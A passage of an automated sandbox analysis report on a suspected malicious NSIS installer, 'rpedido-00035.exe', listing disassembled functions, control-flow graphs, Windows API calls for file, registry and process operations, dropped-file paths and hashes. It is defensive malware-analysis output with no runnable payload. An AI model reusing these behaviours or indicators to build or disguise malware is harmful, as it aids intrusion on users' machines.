                                                          • Associated: 00000000.00000002.44558423844.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.44558685942.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_rpedido-00035.jbxd
                                                          Similarity
                                                          • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                                          • String ID: C:\Users\user\AppData\Local\Temp\nsnE6FB.tmp$C:\Users\user\AppData\Local\Temp\nsnE6FB.tmp\System.dll$C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Eddadigtet\tocsins$Call
                                                          • API String ID: 1941528284-1066334349
                                                          • Opcode ID: c80200c29ca938d3f9be0bc76a293d962ee4304018d07197e4f76f8e1ca0c2de
                                                          • Instruction ID: 6d789f9af123ab0f865e5502c846d56d3cd3544f1fa5f1ae7e054fd30d3333f6
                                                          • Opcode Fuzzy Hash: c80200c29ca938d3f9be0bc76a293d962ee4304018d07197e4f76f8e1ca0c2de
                                                          • Instruction Fuzzy Hash: E741D871510115BACF117BA5CD45EAF3679EF01328B20423FF922F10E1DB3C8A519AAE
                                                          Function 00402644 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 153fileCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 677 402644-40265d call 402c15 680 402663-40266a 677->680 681 402abf-402ac2 677->681 682 40266c 680->682 683 40266f-402672 680->683 684 402ac8-402ace 681->684 682->683 685 4027d6-4027de 683->685 686 402678-402687 call 406310 683->686 685->681 686->685 690 40268d 686->690 691 402693-402697 690->691 692 40272c-40272f 691->692 693 40269d-4026b8 ReadFile 691->693 694 402731-402734 692->694 695 402747-402757 call 405f25 692->695 693->685 696 4026be-4026c3 693->696 694->695 697 402736-402741 call 405f83 694->697 695->685 706 402759 695->706 696->685 699 4026c9-4026d7 696->699 697->685 697->695 702 402792-40279e call 4062f7 699->702 703 4026dd-4026ef MultiByteToWideChar 699->703 702->684 703->706 707 4026f1-4026f4 703->707 709 40275c-40275f 706->709 710 4026f6-402701 707->710 709->702 711 402761-402766 709->711 710->709 712 402703-402728 SetFilePointer MultiByteToWideChar 710->712 713 4027a3-4027a7 711->713 714 402768-40276d 711->714 712->710 715 40272a 712->715 716 4027c4-4027d0 SetFilePointer 713->716 717 4027a9-4027ad 713->717 714->713 718 40276f-402782 714->718 715->706 716->685 719 4027b5-4027c2 717->719 720 4027af-4027b3 717->720 718->685 721 402784-40278a 718->721 719->685 720->716 720->719 721->691 722 402790 721->722 722->685
                                                          APIs
                                                          • ReadFile.KERNELBASE(?,?,?,?), ref: 004026B0
                                                          • MultiByteToWideChar.KERNEL32(?,00000008,?,?,?,?), ref: 004026EB
                                                          • SetFilePointer.KERNELBASE(?,?,?,?,?,00000008,?,?,?,?), ref: 0040270E
                                                          • MultiByteToWideChar.KERNEL32(?,00000008,?,00000000,?,?,?,?,?,00000008,?,?,?,?), ref: 00402724
                                                            • Part of subcall function 00405F83: SetFilePointer.KERNEL32(?,00000000,00000000,?), ref: 00405F99
                                                          • SetFilePointer.KERNEL32(?,?,?,?,?,?,00000002), ref: 004027D0
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.44558288908.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.44558221576.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.44558358783.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.44558423844.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.44558423844.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.44558423844.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.44558423844.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.44558423844.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.44558423844.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.44558685942.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_rpedido-00035.jbxd
                                                          Similarity
                                                          • API ID: File$Pointer$ByteCharMultiWide$Read
                                                          • String ID: 9
                                                          • API String ID: 163830602-2366072709
                                                          • Opcode ID: 87cfad3e31df379bf1329a0d53b4cb21fa96f1686d8734dbec1fa7beea93af1a
                                                          • Instruction ID: c360ee4afea2d2749c5a2d2d3cba589ababf6fe072d155cbc4f623872b1d9462
                                                          • Opcode Fuzzy Hash: 87cfad3e31df379bf1329a0d53b4cb21fa96f1686d8734dbec1fa7beea93af1a
                                                          • Instruction Fuzzy Hash: 2E51F874D0021AAADF20DFA5DA88AAEB779FF04304F50443BE511B72D0D7B899828B58
                                                          Function 0040671A Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 36libraryCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 723 40671a-40673a GetSystemDirectoryW 724 40673c 723->724 725 40673e-406740 723->725 724->725 726 406751-406753 725->726 727 406742-40674b 725->727 729 406754-406787 wsprintfW LoadLibraryExW 726->729 727->726 728 40674d-40674f 727->728 728->729
                                                          APIs
                                                          • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 00406731
                                                          • wsprintfW.USER32 ref: 0040676C
                                                          • LoadLibraryExW.KERNEL32(?,00000000,00000008), ref: 00406780
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.44558288908.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.44558221576.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.44558358783.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.44558423844.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.44558423844.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.44558423844.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.44558423844.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.44558423844.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.44558423844.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.44558685942.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_rpedido-00035.jbxd
                                                          Similarity
                                                          • API ID: DirectoryLibraryLoadSystemwsprintf
                                                          • String ID: %s%S.dll$UXTHEME$\
                                                          • API String ID: 2200240437-1946221925
                                                          • Opcode ID: 40aa1e09304642b089aa1993992f232c43871fa513f82abce0c0f0efb2bd037b
                                                          • Instruction ID: 212fe184e71725d5a8014c1118872f5233ada1a9ecb6260670121aae60094f83
                                                          • Opcode Fuzzy Hash: 40aa1e09304642b089aa1993992f232c43871fa513f82abce0c0f0efb2bd037b
                                                          • Instruction Fuzzy Hash: BBF02170510119ABCF10BB64DD0DF9B375CAB00305F50447AA546F20D1EBBCDA78C798
                                                          Function 004058E3 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 39COMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 730 4058e3-40592e CreateDirectoryW 731 405930-405932 730->731 732 405934-405941 GetLastError 730->732 733 40595b-40595d 731->733 732->733 734 405943-405957 SetFileSecurityW 732->734 734->731 735 405959 GetLastError 734->735 735->733
                                                          APIs
                                                          • CreateDirectoryW.KERNELBASE(?,?,00000000), ref: 00405926
                                                          • GetLastError.KERNEL32 ref: 0040593A
                                                          • SetFileSecurityW.ADVAPI32(?,80000007,00000001), ref: 0040594F
                                                          • GetLastError.KERNEL32 ref: 00405959
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.44558288908.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.44558221576.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.44558358783.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.44558423844.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.44558423844.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.44558423844.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.44558423844.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.44558423844.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.44558423844.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.44558685942.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_rpedido-00035.jbxd
                                                          Similarity
                                                          • API ID: ErrorLast$CreateDirectoryFileSecurity
                                                          • String ID: C:\Users\user\Desktop
                                                          • API String ID: 3449924974-3370423016
                                                          • Opcode ID: 4e538d1c76d2fdfb7cd0fd00a6572ed9e7029d57e55293966324597acc96cb40
                                                          • Instruction ID: c49c088e9ba2396d105a9c54abfe353073567d613583196498a7e7de041cdc41
                                                          • Opcode Fuzzy Hash: 4e538d1c76d2fdfb7cd0fd00a6572ed9e7029d57e55293966324597acc96cb40
                                                          • Instruction Fuzzy Hash: C8011AB1C10619DADF009FA1C9487EFBFB4EF14354F00403AD545B6291D7789618CFA9
                                                          Function 00405ED1 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 37COMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 736 405ed1-405edd 737 405ede-405f12 GetTickCount GetTempFileNameW 736->737 738 405f21-405f23 737->738 739 405f14-405f16 737->739 741 405f1b-405f1e 738->741 739->737 740 405f18 739->740 740->741
                                                          APIs
                                                          • GetTickCount.KERNEL32 ref: 00405EEF
                                                          • GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,"C:\Users\user\Desktop\rpedido-00035.exe",00403487,1033,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,76B73420,004036D5), ref: 00405F0A
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.44558288908.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.44558221576.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.44558358783.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.44558423844.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.44558423844.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.44558423844.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.44558423844.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.44558423844.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.44558423844.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.44558685942.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_rpedido-00035.jbxd
                                                          Similarity
                                                          • API ID: CountFileNameTempTick
                                                          • String ID: "C:\Users\user\Desktop\rpedido-00035.exe"$C:\Users\user\AppData\Local\Temp\$nsa
                                                          • API String ID: 1716503409-1269819148
                                                          • Opcode ID: 0c62091ad8b50aef506abc269e58e4a43f33256201187c1c154fac6de66d8f01
                                                          • Instruction ID: 6418149b7de8853f47a359c443b4445f7a51012143164c36937b703eba88611a
                                                          • Opcode Fuzzy Hash: 0c62091ad8b50aef506abc269e58e4a43f33256201187c1c154fac6de66d8f01
                                                          • Instruction Fuzzy Hash: 51F03076A00204FBEB009F59ED05E9BB7ACEB95750F10803AED41F7250E6B49A54CB69
                                                          Function 10001759 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 118COMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 742 10001759-10001795 call 10001b18 746 100018a6-100018a8 742->746 747 1000179b-1000179f 742->747 748 100017a1-100017a7 call 10002286 747->748 749 100017a8-100017b5 call 100022d0 747->749 748->749 754 100017e5-100017ec 749->754 755 100017b7-100017bc 749->755 756 1000180c-10001810 754->756 757 100017ee-1000180a call 100024a4 call 100015b4 call 10001272 GlobalFree 754->757 758 100017d7-100017da 755->758 759 100017be-100017bf 755->759 763 10001812-1000184c call 100015b4 call 100024a4 756->763 764 1000184e-10001854 call 100024a4 756->764 780 10001855-10001859 757->780 758->754 765 100017dc-100017dd call 10002b57 758->765 761 100017c1-100017c2 759->761 762 100017c7-100017c8 call 1000289c 759->762 769 100017c4-100017c5 761->769 770 100017cf-100017d5 call 10002640 761->770 776 100017cd 762->776 763->780 764->780 773 100017e2 765->773 769->754 769->762 779 100017e4 770->779 773->779 776->773 779->754 785 10001896-1000189d 780->785 786 1000185b-10001869 call 10002467 780->786 785->746 788 1000189f-100018a0 GlobalFree 785->788 792 10001881-10001888 786->792 793 1000186b-1000186e 786->793 788->746 792->785 795 1000188a-10001895 call 1000153d 792->795 793->792 794 10001870-10001878 793->794 794->792 796 1000187a-1000187b FreeLibrary 794->796 795->785 796->792
                                                          APIs
                                                            • Part of subcall function 10001B18: GlobalFree.KERNEL32(?), ref: 10001D83
                                                            • Part of subcall function 10001B18: GlobalFree.KERNEL32(?), ref: 10001D88
                                                            • Part of subcall function 10001B18: GlobalFree.KERNEL32(?), ref: 10001D8D
                                                          • GlobalFree.KERNEL32(00000000), ref: 10001804
                                                          • FreeLibrary.KERNEL32(?), ref: 1000187B
                                                          • GlobalFree.KERNEL32(00000000), ref: 100018A0
                                                            • Part of subcall function 10002286: GlobalAlloc.KERNEL32(00000040,8BC3C95B), ref: 100022B8
                                                            • Part of subcall function 10002640: GlobalAlloc.KERNEL32(00000040,?,?,?,00000000,?,?,?,?,100017D5,00000000), ref: 100026B2
                                                            • Part of subcall function 100015B4: lstrcpyW.KERNEL32(00000000,10004020,00000000,10001731,00000000), ref: 100015CD
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.44573575588.0000000010001000.00000020.00000001.01000000.00000006.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000000.00000002.44573549222.0000000010000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 00000000.00000002.44573601928.0000000010003000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 00000000.00000002.44573630402.0000000010005000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_10000000_rpedido-00035.jbxd
                                                          Similarity
                                                          • API ID: Global$Free$Alloc$Librarylstrcpy
                                                          • String ID:
                                                          • API String ID: 1791698881-3916222277
                                                          • Opcode ID: 80a71440bbdc6676df6433b68331a89e098fd0a61e7fd3645cfd834030fcbe9d
                                                          • Instruction ID: 65685ba44f5e0dd4e22f20931bb662b0f8110762eb821eef9687284fed8b6370
                                                          • Opcode Fuzzy Hash: 80a71440bbdc6676df6433b68331a89e098fd0a61e7fd3645cfd834030fcbe9d
                                                          • Instruction Fuzzy Hash: 4A31AC75804241AAFB14DF649CC9BDA37E8FF043D4F158065FA0AAA08FDFB4A984C761
                                                          Function 004023DE Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 64registrystringCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 799 4023de-40240f call 402c37 * 2 call 402cc7 806 402415-40241f 799->806 807 402abf-402ace 799->807 809 402421-40242e call 402c37 lstrlenW 806->809 810 402432-402435 806->810 809->810 811 402437-402448 call 402c15 810->811 812 402449-40244c 810->812 811->812 816 40245d-402471 RegSetValueExW 812->816 817 40244e-402458 call 4031ba 812->817 821 402473 816->821 822 402476-402557 RegCloseKey 816->822 817->816 821->822 822->807 824 402885-40288c 822->824 824->807
                                                          APIs
                                                          • lstrlenW.KERNEL32(C:\Users\user\AppData\Local\Temp\nsnE6FB.tmp,00000023,00000011,00000002), ref: 00402429
                                                          • RegSetValueExW.KERNELBASE(?,?,?,?,C:\Users\user\AppData\Local\Temp\nsnE6FB.tmp,00000000,00000011,00000002), ref: 00402469
                                                          • RegCloseKey.KERNELBASE(?,?,?,C:\Users\user\AppData\Local\Temp\nsnE6FB.tmp,00000000,00000011,00000002), ref: 00402551
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.44558288908.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.44558221576.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.44558358783.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.44558423844.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.44558423844.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.44558423844.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.44558423844.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.44558423844.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.44558423844.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.44558685942.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_rpedido-00035.jbxd
                                                          Similarity
                                                          • API ID: CloseValuelstrlen
                                                          • String ID: C:\Users\user\AppData\Local\Temp\nsnE6FB.tmp
                                                          • API String ID: 2655323295-3214790736
                                                          • Opcode ID: e48b1e85c28757713ab227aa479e2b9ceb42c74d784ae5642fab68139845f862
                                                          • Instruction ID: 1eab41df84c6b24c6b923ea001d17cdc0cfdc7d4c8a499a75fdfc4da8179f3fa
                                                          • Opcode Fuzzy Hash: e48b1e85c28757713ab227aa479e2b9ceb42c74d784ae5642fab68139845f862
                                                          • Instruction Fuzzy Hash: A1118171E00108AFEB10AFA5DE49EAEBAB4EB54354F11803AF504F71D1DBB84D459B58
                                                          Function 00402D2A Relevance: 6.1, APIs: 4, Instructions: 64registryCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 825 402d2a-402d53 call 40621d 827 402d58-402d5a 825->827 828 402dd0-402dd4 827->828 829 402d5c-402d62 827->829 830 402d7e-402d93 RegEnumKeyW 829->830 831 402d64-402d66 830->831 832 402d95-402da7 RegCloseKey call 40678a 830->832 834 402db6-402dc2 RegCloseKey 831->834 835 402d68-402d7c call 402d2a 831->835 839 402dc4-402dca RegDeleteKeyW 832->839 840 402da9-402db4 832->840 834->828 835->830 835->832 839->828 840->828
                                                          APIs
                                                          • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402D8F
                                                          • RegCloseKey.ADVAPI32(?), ref: 00402D98
                                                          • RegCloseKey.ADVAPI32(?), ref: 00402DB9
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.44558288908.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.44558221576.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.44558358783.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.44558423844.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.44558423844.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.44558423844.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.44558423844.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.44558423844.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.44558423844.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.44558685942.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_rpedido-00035.jbxd
                                                          Similarity
                                                          • API ID: Close$Enum
                                                          • String ID:
                                                          • API String ID: 464197530-0
                                                          • Opcode ID: df4bd2222173038e22a6f7143f63260fc380016edffd80d7804df4238b5218be
                                                          • Instruction ID: 0f4b1bf7762f76a333ccd5711aab570045f86c75fcf3a50f9e11fcc9d843940a
                                                          • Opcode Fuzzy Hash: df4bd2222173038e22a6f7143f63260fc380016edffd80d7804df4238b5218be
                                                          • Instruction Fuzzy Hash: 21116A32540509FBDF129F90CE09BEE7B69EF58344F110076B905B50E0E7B5DE21AB68
                                                          Function 004015C1 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 65COMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 926 4015c1-4015d5 call 402c37 call 405d2c 931 401631-401634 926->931 932 4015d7-4015ea call 405cae 926->932 934 401663-40224a call 401423 931->934 935 401636-401655 call 401423 call 4063b0 SetCurrentDirectoryW 931->935 939 401604-401607 call 405960 932->939 940 4015ec-4015ef 932->940 949 402885-40288c 934->949 950 402abf-402ace 934->950 935->950 955 40165b-40165e 935->955 951 40160c-40160e 939->951 940->939 943 4015f1-4015f8 call 40597d 940->943 943->939 959 4015fa-4015fd call 4058e3 943->959 949->950 952 401610-401615 951->952 953 401627-40162f 951->953 957 401624 952->957 958 401617-401622 GetFileAttributesW 952->958 953->931 953->932 955->950 957->953 958->953 958->957 962 401602 959->962 962->951
                                                          APIs
                                                            • Part of subcall function 00405D2C: CharNextW.USER32(?,?,00425F30,?,00405DA0,00425F30,00425F30,?,?,76B72EE0,00405ADE,?,C:\Users\user\AppData\Local\Temp\,76B72EE0,00000000), ref: 00405D3A
                                                            • Part of subcall function 00405D2C: CharNextW.USER32(00000000), ref: 00405D3F
                                                            • Part of subcall function 00405D2C: CharNextW.USER32(00000000), ref: 00405D57
                                                          • GetFileAttributesW.KERNELBASE(?,?,00000000,0000005C,00000000,000000F0), ref: 0040161A
                                                            • Part of subcall function 004058E3: CreateDirectoryW.KERNELBASE(?,?,00000000), ref: 00405926
                                                          • SetCurrentDirectoryW.KERNELBASE(?,C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Eddadigtet\tocsins,?,00000000,000000F0), ref: 0040164D
                                                          Strings
                                                          • C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Eddadigtet\tocsins, xrefs: 00401640
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.44558288908.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.44558221576.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.44558358783.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.44558423844.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.44558423844.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.44558423844.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.44558423844.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.44558423844.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.44558423844.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.44558685942.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_rpedido-00035.jbxd
                                                          Similarity
                                                          • API ID: CharNext$Directory$AttributesCreateCurrentFile
                                                          • String ID: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Eddadigtet\tocsins
                                                          • API String ID: 1892508949-3607167448
                                                          • Opcode ID: 63e3afcb8f518b8f961fa91b0460bec2abaa85340c93af8d37e8798651ac2648
                                                          • Instruction ID: a4cb8c34a70438e14e420fb04ab38ad532f12a03bdfc5322accc4ce246dd33dc
                                                          • Opcode Fuzzy Hash: 63e3afcb8f518b8f961fa91b0460bec2abaa85340c93af8d37e8798651ac2648
                                                          • Instruction Fuzzy Hash: 9011BE31504104EBCF31AFA0CD0199F36A0EF14368B28493BEA45B22F1DB3E4D51DA4E
                                                          Function 00405995 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24processCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,00426730,Error launching installer), ref: 004059BE
                                                          • CloseHandle.KERNEL32(?), ref: 004059CB
                                                          Strings
                                                          • Error launching installer, xrefs: 004059A8
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.44558288908.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.44558221576.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.44558358783.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.44558423844.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.44558423844.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.44558423844.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.44558423844.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.44558423844.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.44558423844.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.44558685942.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_rpedido-00035.jbxd
                                                          Similarity
                                                          • API ID: CloseCreateHandleProcess
                                                          • String ID: Error launching installer
                                                          • API String ID: 3712363035-66219284
                                                          • Opcode ID: 6d78ed6c6b667bfe634139d4e18f22187190c1a967eebebbcf2d401a0833c7e8
                                                          • Instruction ID: 7702c274cdf70951028335e9b96fa9876c0cc9a795fc840707e03dbfe60e7272
                                                          • Opcode Fuzzy Hash: 6d78ed6c6b667bfe634139d4e18f22187190c1a967eebebbcf2d401a0833c7e8
                                                          • Instruction Fuzzy Hash: B4E046F0A00209BFEB009BA4ED09F7BBAACFB04208F418431BD00F6190D774A8208A78
                                                          Function 00406EEF Relevance: 5.2, APIs: 4, Instructions: 236COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.44558288908.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.44558221576.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.44558358783.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.44558423844.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.44558423844.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.44558423844.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.44558423844.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.44558423844.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.44558423844.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
